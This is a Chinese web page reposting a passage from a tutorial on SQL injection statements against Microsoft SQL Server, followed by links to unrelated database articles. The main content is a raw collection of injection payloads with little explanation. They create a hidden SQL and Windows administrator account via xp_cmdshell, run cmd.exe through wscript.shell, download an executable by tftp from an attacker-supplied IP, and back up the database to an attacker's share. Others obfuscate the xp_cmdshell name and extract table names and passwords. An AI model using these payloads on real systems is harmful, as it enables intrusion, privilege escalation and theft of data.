当前位置: 开发笔记 > 数据库 > 正文

常用SQL注射语句解析（3）_MySQL

作者：392399224_619416 | 来源：互联网 | 2017-05-12 16:09

常用SQL注射语句解析（3）

bitsCN.com

aths(path)

　　values(@test)--

　　;use ku1;--

　　;create table cmd (str image);-- 建立image类型的表cmd

　　存在xp_cmdshell的测试过程：

　　;exec master..xp_cmdshell &＃39;dir&＃39;

　　;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

　　;exec master.dbo.sp_password null,jiaoniang$,1866574;--

　　;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

　　;exec master.dbo.xp_cmdshell &＃39;net user jiaoniang$ 1866574 /workstations:*

　　/times:all /passwordchg:yes /passwordreq:yes /active:yes /add&＃39;;--

　　;exec master.dbo.xp_cmdshell &＃39;net localgroup administrators jiaoniang$

　　/add&＃39;;--

　　exec master..xp_servicecontrol &＃39;start&＃39;, &＃39;schedule&＃39; 启动服务

　　exec master..xp_servicecontrol &＃39;start&＃39;, &＃39;server&＃39;

　　; DECLARE @shell INT EXEC SP_OACreate &＃39;wscript.shell&＃39;,@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,&＃39;run&＃39;,null, &＃39;C：/WINNT/system32/cmd.exe /c net user

　　jiaoniang$ 1866574 /add&＃39;

　　;DECLARE @shell INT EXEC SP_OACreate &＃39;wscript.shell&＃39;,@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,&＃39;run&＃39;,null, &＃39;C：/WINNT/system32/cmd.exe /c net

　　localgroup administrators jiaoniang$ /add&＃39;

　　&＃39;; exec master..xp_cmdshell &＃39;tftp -i youip get file.exe&＃39;-- 利用TFTP上传文件

　　;declare @a sysname set @a=&＃39;xp_&＃39;+&＃39;cmdshell&＃39; exec @a &＃39;dir c:/&＃39;

　　;declare @a sysname set @a=&＃39;xp&＃39;+&＃39;_cm’+’dshell&＃39; exec @a &＃39;dir c:/&＃39;

　　;declare @a;set @a=db_name();backup database @a to

　　disk=&＃39;你的IP你的共享目录bak.dat&＃39;

　　如果被限制则可以。

　　select * from openrowset(&＃39;sqloledb&＃39;,&＃39;server&＃39;;&＃39;sa&＃39;;&＃39;&＃39;,&＃39;select &＃39;&＃39;OK!&＃39;&＃39; exec

　　master.dbo.sp_addlogin hax&＃39;)

　　查询构造：

　　Select * FROM news Where id=... AND topic=... AND .....

　　admin&＃39;and 1=(select count(*) from [user] where username=&＃39;victim&＃39; and

　　right(left(userpass,01),1)=&＃39;1&＃39;) and userpass <>&＃39;

　　select 123;--

　　;use master;--

　　:a&＃39; or name like &＃39;fff%&＃39;;-- 显示有一个叫ffff的用户哈。

　　and 1<>(select count(email) from [user]);--

　　;update [users] set email=(select top 1 name from sysobjects where

　　xtype=&＃39;u&＃39; and status>0) where name=&＃39;ffff&＃39;;--

　　;update [users] set email=(select top 1 id from sysobjects where xtype=&＃39;u&＃39;

　　and name=&＃39;ad&＃39;) where name=&＃39;ffff&＃39;;--

　　&＃39;;update [users] set email=(select top 1 name from sysobjects where

　　xtype=&＃39;u&＃39; and id>581577110) where name=&＃39;ffff&＃39;;--

　　&＃39;;update [users] set email=(select top 1 count(id) from password) where

　　name=&＃39;ffff&＃39;;--

　　&＃39;;update [users] set email=(select top 1 pwd from password where id=2)

　　where name=&＃39;ffff&＃39;;--

　　&＃39;;update [users] set email=(select top 1 name from password where id=2)

　　where name=&＃39;ffff&＃39;;--

　　上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

　　通过查看ffff的用户资料可得第一个用表叫ad

　　然后根据表名ad得到这个表的ID 得到第二个表的名字

　　insert into users values( 666,

　　char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

　　char(0x63)+char(0x68)+char(0x72)+c

bitsCN.com

推荐阅读

数据库
PGXC中的两阶段提交机制及其对事务一致性的保障

PGXC作为一款基于PostgreSQL的分布式数据库系统，利用Sharding技术将数据分散存储于多个数据库实例中。本文探讨了PGXC的两阶段提交过程及其实现事务强一致性的方法。 ... [详细]

蜡笔小新 2024-11-19 14:14:02
insert
PTA 71 jmuds 顺序表区间元素删除 (C语言)

本文提供了一个使用C语言实现的顺序表区间元素删除功能的完整代码示例。该程序首先初始化一个顺序表，然后根据用户输入的数据进行插入操作，最后根据指定的区间范围删除相应的元素，并输出最终的顺序表。 ... [详细]

蜡笔小新 2024-11-19 13:34:15
数据库
探讨密码安全的重要性

近期，多家知名网站如CSDN、人人网、多玩、开心网等的数据库相继被泄露，其中大量用户的账户密码因明文存储而暴露无遗。本文将探讨黑客获取密码的常见手段，网站如何安全存储用户信息，以及用户应如何保护自己的密码。 ... [详细]

蜡笔小新 2024-11-18 21:49:53
mysql
spring(22)JdbcTemplate

2019独角兽企业重金招聘Python工程师标准###1.导入jar包，必须jar包：c3p0、mysql-connector、beans、con ... [详细]

蜡笔小新 2024-11-18 19:49:32
sql
解析与应用：org.apache.hadoop.hdfs.server.namenode.FSNamesystem.shouldUseDelegationTokens() 方法

本文详细介绍了 `org.apache.hadoop.hdfs.server.namenode.FSNamesystem.shouldUseDelegationTokens()` 方法的用途和实际应用场景，并提供了多个代码示例以帮助开发者更好地理解和使用该方法。 ... [详细]

蜡笔小新 2024-11-18 17:59:10
sql
Java代码保护与混淆：ProGuard详解

在Java开发中，保护代码安全是一个重要的课题。由于Java字节码容易被反编译，因此使用代码混淆工具如ProGuard变得尤为重要。本文将详细介绍如何使用ProGuard进行代码混淆，以及其基本原理和常见问题。 ... [详细]

蜡笔小新 2024-11-18 16:46:17
database
使用参数化查询防止SQL注入

本文介绍如何通过参数化查询来防止SQL注入攻击，确保数据库的安全性。示例代码展示了在C#中使用参数化查询添加学生信息的方法。 ... [详细]

蜡笔小新 2024-11-18 15:53:22
mysql
开发笔记:[14]SQL 别名

开发笔记:[14]SQL 别名 ... [详细]

蜡笔小新 2024-11-18 15:34:08
oracle
oracle 对硬件环境要求,Oracle 10G数据库软硬件环境的要求

oracle 对硬件环境要求,Oracle 10G数据库软硬件环境的要求 ... [详细]

蜡笔小新 2024-11-18 15:17:57
数据库
GitHub上的Python开源项目及IM技术应用

本文介绍了GitHub上的一些Python开源项目，特别是IM（即时通讯）技术的应用。通过Sealtalk项目，探讨了如何利用开源SDK提升开发效率。 ... [详细]

蜡笔小新 2024-11-18 14:35:56
oracle
Redis：缓存与内存数据库详解

本文介绍了数据库的基本分类，重点探讨了关系型与非关系型数据库的区别，并详细解析了Redis作为非关系型数据库的特点、工作模式、优点及持久化机制。 ... [详细]

蜡笔小新 2024-11-18 14:16:11
mysql
Linux环境下MySQL的安装与配置

本文详细介绍了在Linux系统上安装和配置MySQL的步骤，包括安装前的准备工作、下载和解压安装包、初始化数据库、配置文件编辑、启动服务以及设置开机自启动等。 ... [详细]

蜡笔小新 2024-11-18 12:25:15
sql
CentOS 7 下 Python 3.7 的安装与配置

本文详细介绍了在 CentOS 7 系统中安装 Python 3.7 的步骤，包括编译工具的安装、Python 3.7 源码的下载与编译、软链接的创建以及常见错误的处理方法。 ... [详细]

蜡笔小新 2024-11-18 12:21:04
sql
SQL Server 跨服务器和实例连接方法

本文介绍了如何使用 SQL Server 的 OPENDATASOURCE 函数连接到不同的服务器和实例，并查询数据。 ... [详细]

蜡笔小新 2024-11-18 11:58:50
sql
SQL Server: 防止具有相同参数的记录插入

本文探讨如何在SQL Server中防止具有相同参数组合的记录被插入到表中，特别是在表中存在多个列的情况下。 ... [详细]

蜡笔小新 2024-11-18 11:29:54

392399224_619416

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章